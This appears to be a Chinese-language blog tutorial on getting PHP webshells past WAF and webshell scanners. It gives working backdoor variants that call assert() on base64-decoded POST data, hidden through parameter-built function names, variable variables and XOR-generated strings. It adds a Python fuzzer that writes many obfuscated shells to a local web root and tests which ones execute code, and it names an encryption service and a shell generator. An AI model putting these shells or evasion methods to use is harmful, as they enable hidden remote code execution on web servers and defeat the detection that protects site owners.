WAF攻防-权限控制&代码免杀&异或运算&变量覆盖&混淆加密&传参

2024-07-18 15:36:16 浏览数 (3)

webshell检测平台 https://scanner.baidu.com/#/pages/intro https://ti.aliyun.com/#/webshell

基础-脚本后门控制原理-代码解释

对比工具代码-菜刀&蚁剑&冰蝎&哥斯拉等

原理-脚本后门查杀机制-函数&行为

对比WAF规则-函数匹配&工具指纹等

代码-脚本后门免杀变异-覆盖&传参

1.php 传参带入

代码语言:javascript复制
<?php 
$a=$_GET['a'];
$aa=$a.'ert';
$aa(base64_decode($_POST['x']));
?>

?a=ass x=cGhwaW5mbygpOw==

2.php 变量覆盖

代码语言:javascript复制
<?php 
$a='b';
$b='assert';
$$a(base64_decode($_POST['x']));
?>

x=cGhwaW5mbygpOw==

代码-脚本后门免杀变异-异或&加密

3.php 加密变异 http://www.phpjm.net/

4.php 异或运算

代码语言:javascript复制
import requests
import time
import threading,queue

def string():
    while not q.empty():
        filename=q.get()
        url = 'http://127.0.0.1:8081/x/'   filename
        datas = {
            'x': 'phpinfo();'
        }
        result = requests.post(url, data=datas).content.decode('utf-8')
        if 'XIAODI-PC' in result:
            print('check->' filename '->ok')
        else:
            print('check->' filename '->no')
        time.sleep(1)


def shell_test_check():
    url='http://127.0.0.1:8081/x/33xd64.php'
    datas={
        'x':'phpinfo();'
    }
    result=requests.post(url,data=datas).content.decode('utf-8')
    print(result)
    if 'XIAODI-PC' in result:
        print('ok')

if __name__ == '__main__':
    q=queue.Queue()
    for i in range(1, 127):
        for ii in range(1, 127):
            payload = "'"   chr(i)   "'"   '^'   "'"   chr(ii)   "'"
            code = "<?php $a=("   payload   ").'ssert';$a($_POST[x]);?>"
            filename = str(i)   'xd'   str(ii)   '.php'
            q.put(filename)
            with open('D:/phpstudy/PHPTutorial/WWW/x/'   filename, 'a') as f:
                f.write(code)
                f.close()
                print('Fuzz文件生成成功')
    for x in range(20):
        t=threading.Thread(target=string)
        t.start()

拓展-脚本后门脚本类型-JSP&ASPX

5.php 脚本生成器 Webshell-venom ASP PHP JSP ASPX

1 人点赞